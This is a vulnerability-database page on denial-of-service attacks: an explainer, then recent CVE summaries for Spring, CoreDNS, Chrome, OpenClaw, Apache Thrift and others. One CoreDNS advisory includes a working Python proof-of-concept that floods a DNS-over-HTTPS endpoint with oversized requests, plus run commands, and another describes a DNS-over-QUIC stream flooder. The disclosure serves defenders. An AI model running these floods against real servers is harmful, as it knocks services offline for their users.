Skip to main content

Denial of Service

other MEDIUM

Denial of Service attacks render applications or systems unavailable by overwhelming resources or triggering failure conditions.

How It Works

Denial of Service attacks render applications or systems unavailable by overwhelming resources or triggering failure conditions. Attackers exploit asymmetry: minimal attacker effort produces disproportionate resource consumption on the target. Application-level attacks use specially crafted inputs that trigger expensive operations—a regex engine processing malicious patterns can backtrack exponentially, or XML parsers recursively expand entities until memory exhausts. Network-level attacks flood targets with connection requests or amplify traffic through reflection, but application vulnerabilities often provide the most efficient attack surface.

The attack typically begins with reconnaissance to identify resource-intensive operations or unprotected endpoints. For algorithmic complexity attacks, adversaries craft inputs hitting worst-case performance—hash collision inputs filling hash tables with collisions, deeply nested JSON triggering recursive parsing, or pathological regex patterns like (a+)+b against strings of repeated 'a' characters. Resource exhaustion attacks open thousands of connections, upload massive files to unbounded storage, or trigger memory leaks through repeated operations. Crash-based attacks target error handling gaps: null pointer dereferences, unhandled exceptions in parsers, or assertion failures that terminate processes.

Impact

  • Service unavailability preventing legitimate users from accessing applications during attack duration
  • Revenue loss from downtime in e-commerce, SaaS platforms, or transaction processing systems
  • Cascading failures as resource exhaustion spreads to dependent services or database connections pool out
  • SLA violations triggering financial penalties and damaging customer trust
  • Security team distraction providing cover for data exfiltration or intrusion attempts running concurrently

Real-World Examples

CVE-2018-1000544 in Ruby's WEBrick server allowed ReDoS through malicious HTTP headers containing specially crafted patterns that caused the regex engine to backtrack exponentially, freezing request processing threads. A single attacker could saturate all available workers.

Cloudflare experienced a global outage in 2019 when a single WAF rule containing an unoptimized regex hit pathological cases on legitimate traffic spikes. The .*(?:.*=.*)* pattern exhibited catastrophic backtracking, consuming CPU cycles across their edge network until the rule was disabled.

CVE-2013-1664 demonstrated XML bomb vulnerabilities in Python's XML libraries. Attackers uploaded XML documents with nested entity definitions-each entity expanding to ten copies of the previous level. A 1KB upload could expand to gigabytes in memory during parsing, crashing applications instantly.

Mitigation

  • Strict input validation enforcing size limits, complexity bounds, and nesting depth restrictions before processing
  • Request rate limiting per IP address, API key, or user session with exponential backoff
  • Timeout enforcement terminating operations exceeding reasonable execution windows (typically 1-5 seconds)
  • Resource quotas limiting memory allocation, CPU time, and connection counts per request or tenant
  • Regex complexity analysis using linear-time algorithms or sanitizing patterns to eliminate backtracking
  • Circuit breakers automatically rejecting requests when error rates or latency thresholds indicate degradation
  • Load balancing and autoscaling distributing traffic across instances with automatic capacity expansion

Recent CVEs (36512)

EPSS 0% CVSS 3.1
LOW PATCH Monitor

Spring MVC and WebFlux applications are vulnerable to cache poisoning when resolving static resources. More precisely, an application can be vulnerable when all the following are true: * the application is using Spring MVC or Spring WebFlux * the application is configuring the  resource chain support https://docs.spring.io/spring-framework/reference/web/webmvc/mvc-config/static-resources.html#page-title  with caching enabled * the application adds support for encoded resources resolution * the resource cache must be empty when the attacker has access to the application When all the conditions above are met, the attacker can send malicious requests and poison the resource cache with resources using the wrong encoding. This can cause a denial of service by breaking the front-end application for clients.

Java Denial Of Service
NVD HeroDevs VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

A WebFlux server application that processes multipart requests creates temp files for parts larger than 10 K. Under some circumstances, temp files may remain not deleted after the request is fully processed. This allows an attacker to consume available disk space. Older, unsupported versions are also affected.

Denial Of Service Red Hat
NVD HeroDevs VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

OpenTelemetry's Zipkin exporter for .NET allows unauthenticated remote attackers to trigger denial of service by sending spans with high-cardinality remote endpoint attributes, causing unbounded memory growth in the remote endpoint cache and eventual process degradation. CVSS 5.3 (network-accessible, low complexity). Patch available from vendor; no active exploitation identified.

Denial Of Service
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

### Summary CoreDNS's DNS-over-HTTPS (DoH) GET path accepts oversized `dns=` query values and performs substantial request parsing, query unescaping, base64 decoding, and message unpacking work before returning `400 Bad Request`. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to `/dns-query?dns=...` and force high CPU usage, large transient allocations, elevated garbage-collection pressure, and increased resident memory consumption even though the requests are ultimately rejected. This is a denial-of-service issue caused by expensive pre-validation processing on the DoH GET path. ### Details The vulnerable flow is in `plugin/pkg/doh/doh.go`: - `RequestToMsg()` dispatches GET requests to `requestToMsgGet()`: - `plugin/pkg/doh/doh.go:79-89` - `requestToMsgGet()` calls `req.URL.Query()`, extracts `dns`, and passes it directly to `base64ToMsg()`: - `plugin/pkg/doh/doh.go:99-108` - `base64ToMsg()` decodes the full attacker-controlled value via `b64Enc.DecodeString()` and only then attempts to unpack it into a DNS message: - `plugin/pkg/doh/doh.go:121-130` Relevant snippet: ```go func requestToMsgGet(req *http.Request) (*dns.Msg, error) { values := req.URL.Query() b64, ok := values["dns"] if !ok { return nil, fmt.Errorf("no 'dns' query parameter found") } if len(b64) != 1 { return nil, fmt.Errorf("multiple 'dns' query values found") } return base64ToMsg(b64[0]) } func base64ToMsg(b64 string) (*dns.Msg, error) { buf, err := b64Enc.DecodeString(b64) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ```` By contrast, the POST path applies a bounded read before unpacking: ```go func toMsg(r io.ReadCloser) (*dns.Msg, error) { buf, err := io.ReadAll(http.MaxBytesReader(nil, r, 65536)) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ``` So, POST is explicitly size-bounded, while GET is not equivalently bounded before expensive parsing and decoding work occurs. In addition, the HTTPS server is created in `core/dnsserver/server_https.go:87-92` without an explicit early GET-path size guard in this path: ```go srv := &http.Server{ ReadTimeout: s.ReadTimeout, WriteTimeout: s.WriteTimeout, IdleTimeout: s.IdleTimeout, ErrorLog: stdlog.New(&loggerAdapter{}, "", 0), } ``` As a result, oversized DoH GET request targets are processed through: 1. HTTP request-line parsing 2. URL query parsing / unescaping 3. DoH GET extraction 4. base64 decoding 5. DNS message unpacking before the request is rejected. ### Root cause The root cause is missing early size validation on the DoH GET path. More specifically: * `requestToMsgGet()` performs `req.URL.Query()` on attacker-controlled oversized request targets. * The extracted `dns` value is passed to `base64ToMsg()` without an encoded-length or decoded-length bound. * `base64ToMsg()` fully decodes the attacker-controlled string before any DNS-size rejection. * The POST path already has an explicit bounded read, but GET does not have an equivalent pre-decode bound. This creates a pre-validation resource-amplification path for DoH GET. ### PoC #### Local test setup This was reproduced locally against CoreDNS 1.14.2 over HTTPS with `pprof` enabled. Create a self-signed certificate: ```bash openssl req -x509 -newkey rsa:2048 -sha256 -days 1 -nodes \ -keyout key.pem -out cert.pem \ -subj "/CN=127.0.0.1" ``` Create this `Corefile`: ```txt https://127.0.0.1:8443 { whoami log errors tls cert.pem key.pem pprof 127.0.0.1:6060 } ``` Run CoreDNS: ```bash ./coredns -conf Corefile ``` #### Proof-of-concept script ```python #!/usr/bin/env python3 import argparse import base64 import collections import concurrent.futures import http.client import ssl import time def send_one(host, port, path, timeout): ctx = ssl._create_unverified_context() conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx) try: conn.request("GET", path, headers={ "Accept": "application/dns-message", "Connection": "close", }) resp = conn.getresponse() resp.read() return resp.status except Exception as e: return f"ERR:{type(e).__name__}" finally: try: conn.close() except Exception: pass def main(): ap = argparse.ArgumentParser() ap.add_argument("--host", default="127.0.0.1") ap.add_argument("--port", type=int, default=8443) ap.add_argument("--decoded-kib", type=int, default=720) ap.add_argument("--workers", type=int, default=64) ap.add_argument("--requests", type=int, default=5000) ap.add_argument("--timeout", type=float, default=5.0) args = ap.parse_args() raw = b"A" * (args.decoded_kib * 1024) b64 = base64.urlsafe_b64encode(raw).rstrip(b"=").decode() path = "/dns-query?dns=" + b64 print(f"[+] target = https://{args.host}:{args.port}") print(f"[+] decoded bytes = {len(raw):,}") print(f"[+] encoded chars = {len(b64):,}") print(f"[+] request-target length = {len(path):,}") print(f"[+] workers = {args.workers}, requests = {args.requests}") print("[+] 400 responses are expected; the issue is expensive processing before rejection.\n") started = time.time() results = collections.Counter() with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as ex: futs = [ ex.submit(send_one, args.host, args.port, path, args.timeout) for _ in range(args.requests) ] for i, fut in enumerate(concurrent.futures.as_completed(futs), 1): results[fut.result()] += 1 if i % 10 == 0 or i == args.requests: print(f"[{i}/{args.requests}] {dict(results)}") elapsed = time.time() - started print("\n[+] done") print(f"[+] elapsed = {elapsed:.2f}s") print(f"[+] summary = {dict(results)}") if __name__ == "__main__": main() ``` Run the PoC: ```bash python3 poc_doh_get_oversize_https.py \ --host 127.0.0.1 \ --port 8443 \ --decoded-kib 720 \ --workers 64 \ --requests 5000 ``` #### Profiling commands used during reproduction CPU profile: ```bash (curl -s "http://127.0.0.1:6060/debug/pprof/profile?seconds=20" -o cpu_attack.pb.gz &) ; \ sleep 1 ; \ python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 ; \ wait go tool pprof -top ./coredns cpu_attack.pb.gz ``` Heap / allocation profiles: ```bash curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_before.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_before.pb.gz python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_after.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_after.pb.gz go tool pprof -top -base heap_before.pb.gz ./coredns heap_after.pb.gz go tool pprof -top -base allocs_before.pb.gz ./coredns allocs_after.pb.gz ``` ### Reproduction results The issue was confirmed using the following: * CoreDNS 1.14.2 * linux/amd64 * go1.26.1 PoC payload characteristics: * decoded payload size: `737,280 bytes` * base64url-encoded `dns` length: `983,040` * request-target length: `983,055` Observed request outcome: * `5000 / 5000` requests returned `400 Bad Request` * total runtime for the 5000-request run: `18.22s` The important point is that the requests are rejected only after expensive processing has already happened. #### CPU profile highlights The CPU profile captured during the attack showed significant time in: * `net/http.readRequest` * `net/url.ParseQuery` / `net/url.QueryUnescape` / `net/url.unescape` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` * `encoding/base64.(*Encoding).DecodeString` * Go GC worker paths Representative cumulative values from the captured profile included: * `github.com/coredns/coredns/core/dnsserver.(*ServerHTTPS).ServeHTTP` → `10.91s` * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `3.50s` * `encoding/base64.(*Encoding).DecodeString` → `3.46s` * `net/http.readRequest` → `10.57s` * `net/url.(*URL).Query` / `ParseQuery` / `QueryUnescape` → `7.38s` * `runtime.gcBgMarkWorker` and related GC paths were also heavily active This demonstrates that the issue is not limited to final DNS unpacking. The oversized GET request forces meaningful work in HTTP parsing, URL handling, base64 decoding, and garbage collection before rejection. #### Allocation profile highlights Allocation profiling showed very large transient allocation volume caused by the rejected requests: * total `alloc_space`: `26,756.48 MB` Top contributors included: * `net/textproto.(*Reader).readLineSlice` → `19,668.19 MB` * `net/textproto.(*Reader).ReadLine` → `3,738.84 MB` * `encoding/base64.(*Encoding).DecodeString` → `2,766.16 MB` Within the CoreDNS DoH GET path specifically: * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `2,773.67 MB` Heap delta (`inuse_space`) also showed live growth attributable to this path, including: * `encoding/base64.(*Encoding).DecodeString` → `7,629.75 kB` #### Memory observations Runtime memory monitoring showed a clear increase in peak resident usage during the attack: * baseline `VmHWM / VmRSS` before load was approximately `55,864 kB` * observed `VmHWM` during testing reached approximately `146,100 kB` So even though requests returned `400`, the server still experienced substantial transient memory growth and allocator / GC pressure before rejection. ### Impact A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to the HTTPS endpoint and force significant pre-rejection work. Impact includes: * elevated CPU consumption * large transient allocations * increased garbage-collection pressure * higher peak resident memory usage * degraded throughput and responsiveness * denial of service risk on memory-constrained or heavily loaded deployments This is especially relevant for internet-facing DoH deployments, where an attacker can repeatedly trigger the GET parsing path without authentication. The fact that the final HTTP status is `400 Bad Request` does not mitigate the issue, because the expensive processing has already occurred before the rejection is generated. ### Suggested remediation A robust fix should address both stages of the problem: 1. Apply an early bound on the DoH GET request target / raw query length before expensive query parsing. 2. Enforce an encoded-length and decoded-length limit for the `dns` parameter before calling `DecodeString()`. 3. Preserve equivalent size constraints across GET and POST paths. A minimal hardening direction would be: * reject oversized GET requests before `req.URL.Query()` on the DoH path * reject `dns` values whose encoded length exceeds the maximum valid DNS message encoding * reject any decoded payload larger than the supported DNS message size before unpacking

Suse OpenSSL Python +2
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

### Summary CoreDNS' DNS-over-QUIC (DoQ) server can be driven into large goroutine and memory growth by a remote client that opens many QUIC streams and stalls after sending only 1 byte. Even with a small configured quic { worker_pool_size ... }, CoreDNS still spawns a goroutine per accepted stream (workers + waiters) and active workers can block indefinitely in io.ReadFull() with no per-stream read deadline, enabling unauthenticated remote DoS via memory exhaustion/OOM-kill. ### Details CoreDNS' DoQ server uses a global worker pool (streamProcessPool) to limit concurrent stream processing, but when the pool is full it still spawns a goroutine per accepted stream that waits to acquire a worker token: select { case s.streamProcessPool <- ...: go ...; default: go ... wait for token ... } (core/dnsserver/server_quic.go) Additionally, the DoQ message framing reads are blocking io.ReadFull() calls with no per-stream read deadline: readDOQMessage() reads the 2-byte length prefix and message body via io.ReadFull() (core/dnsserver/server_quic.go) This allows an attacker to pin all workers by sending 1 byte (so io.ReadFull() blocks waiting for the second byte of the DoQ length prefix), while also creating an unbounded backlog of goroutines waiting for a worker token. Note: this appears to be a result of an incomplete fix/regression for CVE-2025-47950 (GHSA-cvx7-x8pj-x2gw). ### PoC 1. Adjust COREDNS_BIN in the PoC to point at right path (see the top-level const definitions for tunables as well) 2. Run python3 ./doq-dos-repro.py 3. Expected sample output: *** Start CoreDNS *** Corefile: /tmp/vh-f003-doq-mem-regression/Corefile Log: /tmp/vh-f003-doq-mem-regression/coredns.log *** Baseline sample (idle) *** rss_kib=49380 go_goroutines=17 *** Build + run partial-stream flooder *** go: downloading golang.org/x/net v0.43.0 go: downloading golang.org/x/crypto v0.41.0 go: downloading go.uber.org/mock v0.5.2 go: downloading github.com/stretchr/testify v1.11.1 go: downloading golang.org/x/sys v0.35.0 go: downloading github.com/pmezard/go-difflib v1.0.0 go: downloading github.com/davecgh/go-spew v1.1.1 go: downloading gopkg.in/yaml.v3 v3.0.1 *** Candidate sample (during attack) *** rss_kib=137968 go_goroutines=15557 *** Flooder output *** opened conns=60 streams_per_conn=256 total_streams=15360 *** Wrote results *** /tmp/vh-f003-doq-mem-regression/results.json *** OK *** DoQ flood caused goroutine/RSS growth despite worker_pool_size. ### Impact Unauthenticated remote DoS on an encrypted DNS transport via goroutine/RSS growth leading to OOM-kill/crash and service outage.

Suse Denial Of Service Red Hat
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in Media in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in WebRTC in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in WebView in Google Chrome on Android prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Use after free in Cast in Google Chrome prior to 147.0.7727.138 allowed an attacker on the local network segment to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: High)

Memory Corruption Use After Free Google +4
NVD VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Use after free in Chromoting in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: High)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in WebRTC in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in media in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in Codecs in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Use after free in Cast in Google Chrome prior to 147.0.7727.138 allowed an attacker on the local network segment to execute arbitrary code inside a sandbox via malicious network traffic. (Chromium security severity: High)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Use after free in WebMIDI in Google Chrome prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Use After Free Google +4
NVD VulDB
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Use after free in Media in Google Chrome on Android prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Use After Free Google +4
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in Navigation in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Use after free in GPU in Google Chrome prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Use After Free Google +4
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in Views in Google Chrome on Mac prior to 147.0.7727.138 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Use After Free Google +4
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in Animation in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in ANGLE in Google Chrome prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Use After Free Google +4
NVD VulDB
EPSS 0% CVSS 9.6
CRITICAL PATCH Act Now

Use after free in GPU in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Use After Free Google +4
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

Use After Free Microsoft Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

Use After Free Microsoft Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in iOS in Google Chrome prior to 147.0.7727.138 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

Use After Free Memory Corruption Apple +5
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in Canvas in Google Chrome on Linux, ChromeOS prior to 147.0.7727.138 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Critical)

Use After Free RCE Memory Corruption +5
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

OpenClaw before 2026.4.8 contains improper input validation in base64 decode paths that allocate memory before enforcing decoded-size limits. Attackers can exploit multiple code paths to cause memory exhaustion or denial of service through crafted base64-encoded input.

Denial Of Service Openclaw
NVD GitHub VulDB
EPSS 0% CVSS 2.3
LOW PATCH Monitor

OpenClaw before 2026.3.31 contains a resource exhaustion vulnerability in media downloads that bypasses core safety limits for file size, count, and cleanup operations. Attackers can exhaust disk space by downloading media files without triggering intended safety restrictions, causing availability impact.

Denial Of Service Openclaw
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Resource exhaustion in OpenClaw before 2026.3.31 allows remote unauthenticated attackers to crash servers by sending malicious Microsoft Teams webhook payloads. The application parses request bodies before performing JWT validation, enabling attackers to bypass authentication and trigger denial-of-service conditions. A vendor patch is available via GitHub commit 3834d47, with no evidence of active exploitation (not in CISA KEV) and no public POC identified at time of analysis.

Denial Of Service Openclaw
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

OpenClaw before version 2026.3.31 fails to properly validate WebSocket frame sizes in its voice-call component before processing, allowing remote unauthenticated attackers to send oversized frames that trigger excessive resource consumption and denial of service. This vulnerability represents an incomplete remediation of CVE-2026-32062, demonstrating that the original fix did not address the root validation sequencing issue.

Denial Of Service Openclaw
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Denial of service in OpenClaw (pre-2026.3.28) allows remote unauthenticated attackers to exhaust server resources by flooding the application with concurrent WebSocket upgrade requests. The vulnerability stems from lack of rate-limiting and resource budgeting before authentication, enabling attackers to monopolize socket and worker thread capacity and block legitimate WebSocket clients. No active exploitation confirmed (not in CISA KEV), but the technical barrier is low given unauthenticated network access (CVSS:4.0 AV:N/AC:L/PR:N). VulnCheck reported this vulnerability with vendor advisory available on GitHub.

Denial Of Service Openclaw
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

OpenClaw before version 2026.3.31 performs Discord audio preflight transcription without validating member authorization, allowing unauthenticated remote attackers to trigger resource-intensive audio processing and cause denial of service through resource exhaustion.

Denial Of Service Openclaw
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Authentication bypass in NVIDIA NVFlare Dashboard allows remote unauthenticated attackers to escalate privileges through user-controlled key manipulation in the authentication system. The vulnerability affects the NVIDIA Flare SDK and enables complete system compromise including arbitrary code execution, data tampering, information disclosure, and denial of service. With a CVSS score of 9.8 (critical severity) and maximum exploitability metrics (AV:N/AC:L/PR:N/UI:N), this represents a severe security flaw requiring immediate remediation, though no active exploitation (KEV) or public exploit code has been identified at time of analysis.

RCE Authentication Bypass Nvidia +3
NVD
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Spring AI versions 1.0.0-1.0.5 and 1.1.0-1.1.4 are vulnerable to denial of service through uncontrolled resource consumption when processing maliciously crafted PDF files via the ForkPDFLayoutTextStripper component. Authenticated remote attackers can exhaust server memory and crash affected applications by uploading or processing specially designed PDFs. Vendor-released patches address the issue in versions 1.0.6 and 1.1.5.

Java Denial Of Service
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote unauthenticated denial of service in Apache Thrift c_glib language bindings (versions before 0.23.0) allows attackers to crash Thrift servers via specially crafted requests triggering 'free(): invalid pointer' fatal errors. CVSS 7.5 (HIGH) with network vector and low complexity. EPSS score is only 0.02% (4th percentile), indicating very low real-world exploitation probability despite theoretical severity. No active exploitation confirmed (not in CISA KEV); no public POC identified at time of analysis. Vendor-released patch: Apache Thrift 0.23.0.

Denial Of Service Apache Apache Thrift
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Integer overflow in Apache Thrift's Go TFramedTransport implementation allows remote unauthenticated attackers to crash server processes via specially crafted uint32 values. Affects all Thrift versions prior to 0.23.0 with EPSS score of 0.02% (low exploitation probability). This is one of six related vulnerabilities disclosed simultaneously affecting different Thrift language bindings (Go, Swift, Java, c_glib), indicating coordinated security audit findings. Vendor patch available in version 0.23.0 released April 2026.

Denial Of Service Integer Overflow Java +2
NVD VulDB
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Integer overflow in Apache Thrift Swift Compact Protocol implementation versions prior to 0.23.0 enables remote unauthenticated attackers to achieve partial confidentiality, integrity, and availability impact. This is one of six related vulnerabilities disclosed simultaneously affecting multiple Apache Thrift language implementations (Swift, Node.js, C++, c_glib, Go). EPSS score of 0.02% (5th percentile) indicates low current exploitation probability, with no active exploitation confirmed by CISA KEV at time of analysis. Vendor-released patch version 0.23.0 addresses this and related Thrift implementation flaws.

Node.js Integer Overflow Denial Of Service +2
NVD VulDB
EPSS 0% CVSS 7.4
HIGH PATCH This Week

Apache Thrift Java TSSLTransportFactory fails to verify server hostnames in TLS connections, enabling man-in-the-middle attacks against versions prior to 0.23.0. This CWE-297 (improper certificate validation) vulnerability allows network attackers with high complexity positioning to intercept and modify encrypted communications without authentication. EPSS exploitation probability is low (0.01%, 1st percentile), with no KEV listing or public exploit code identified at time of analysis. Vendor patch available in Thrift 0.23.0.

Denial Of Service Java Apache +1
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Stack overflow in Apache Thrift c_glib dispatch mechanism allows remote attackers to trigger denial of service via crafted network requests. The vulnerability affects Apache Thrift versions prior to 0.23.0 and requires no authentication or user interaction, resulting in application crashes or service unavailability. Patch is available from the vendor.

Node.js Denial Of Service Apache +1
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote denial of service in MIT Kerberos 5 (krb5) before 1.22.3 lets an unauthenticated attacker crash any GSS-API acceptor that has a NegoEx mechanism registered in /etc/gss/mech. Sending a malformed NegoEx token to an application that calls gss_accept_sec_context() triggers a NULL pointer dereference in parse_nego_message, terminating the process (CWE-476). No public exploit identified at time of analysis; EPSS is low (0.07%) and CISA SSVC lists exploitation as proof-of-concept only, with technical impact rated partial and not automatable.

Null Pointer Dereference Denial Of Service Kerberos 5
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

Denial of service in the Linux kernel EDAC (Error Detection and Correction) subsystem due to improper initialization ordering in edac_mc_alloc(). When memory allocation fails during EDAC memory controller initialization, the error path calls put_device() before device_initialize() is executed, triggering a null pointer dereference in kobject_put() that causes a kernel panic or system crash. This affects Linux systems with EDAC support enabled across multiple kernel versions from 5.19 through 7.0.

Red Hat Suse Denial Of Service +2
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Use-after-free in Linux kernel driver core allows local authenticated users to execute arbitrary code, escalate privileges, or crash the system via race condition in device-driver binding operations. The vulnerability stems from inconsistent locking in driver_match_device() function calls, specifically affecting driver_override functionality where device_lock was not held during bind_store() and __driver_attach() operations. EPSS probability is very low (0.02%, 5th percentile), indicating minimal real-world exploitation observed. No active exploitation confirmed - no CISA KEV listing identified. Patch available in kernel 7.0+ and backport commit dc23806a7c47.

Red Hat Suse Denial Of Service +3
NVD VulDB
EPSS 0% CVSS 7.3
HIGH POC PATCH This Week

authd prior to version 0.6.4 contains a logic error in primary group ID assignment that can lead to local privilege escalation. When a user's primary group ID (GID) differs from their UID, either because the account was created with authd prior to version 0.5.4 or because the primary group was manually changed via the `authctl group set-gid` command, and the user's identity provider record is updated, authd incorrectly resets the user's primary group ID to their UID upon next login. This causes newly created files and directories to be owned by the wrong group, causing denial of service issues, and potentially granting unintended access to other local users and allowing local privilege escalation.

Privilege Escalation Denial Of Service Authd
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Atom table exhaustion in plug_cowboy 2.0.0-2.8.0 allows remote denial of service via HTTP/2. Unauthenticated attackers can crash the Erlang VM by sending HTTP/2 requests with unique :scheme pseudo-header values, permanently filling the non-garbage-collected atom table until the system_limit is reached. Affects only HTTP/2 connections; HTTP/1.1 is not vulnerable. CVSS 8.7 (High) with network attack vector, low complexity, and no required privileges. No active exploitation confirmed (not in CISA KEV), but exploit is trivial given the publicly documented attack mechanism in the GitHub advisory.

Denial Of Service
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM This Month

Modal dialog reentry vulnerability in Foxit PDF Editor and Reader allows local attackers to trigger UI freeze and denial of service by supplying a crafted PDF document with a malicious action chain, requiring user interaction to open the file. The vulnerability stems from improper control flow management in document action handling and results in application unresponsiveness on the main thread. No public exploit code or active exploitation has been identified at the time of analysis.

Denial Of Service Foxit Pdf Editor Foxit Pdf Reader
NVD VulDB
EPSS 0% CVSS 7.8
HIGH This Week

Use-after-free in Foxit PDF Reader and Foxit PDF Editor allows arbitrary code execution when specially crafted PDF documents trigger UI refresh operations after comment deletion via scripting. Local attackers can deliver malicious PDFs and achieve code execution with high integrity and confidentiality impact once a user opens the file. CVSS 7.8 indicates high severity but requires user interaction, limiting automated exploitation. No public exploit code or active exploitation confirmed at time of analysis.

Memory Corruption Use After Free Denial Of Service +2
NVD VulDB
